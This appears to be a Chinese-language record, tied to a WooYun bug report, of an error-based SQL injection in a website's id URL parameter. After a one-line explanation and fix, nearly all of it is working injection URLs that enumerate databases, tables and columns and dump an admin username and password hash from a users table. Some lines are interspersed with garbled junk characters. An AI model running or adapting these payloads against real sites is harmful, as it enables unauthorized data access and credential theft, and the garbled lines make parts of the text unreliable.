http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试，没想到这有，可以测试下，做个记录而已。从下面的请求形式看，记录的是 id 参数处的报错型（error-based）SQL 注入：id 的值被直接拼接进 SQL，且数据库报错信息回显给了客户端；修复应改用参数化查询，并关闭对外的数据库报错输出。
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
- X# ]3 v% p2 \! A11 211 P' t. o1 J* [1 T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
7 |) y- Y: d" r) C/ s! G11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd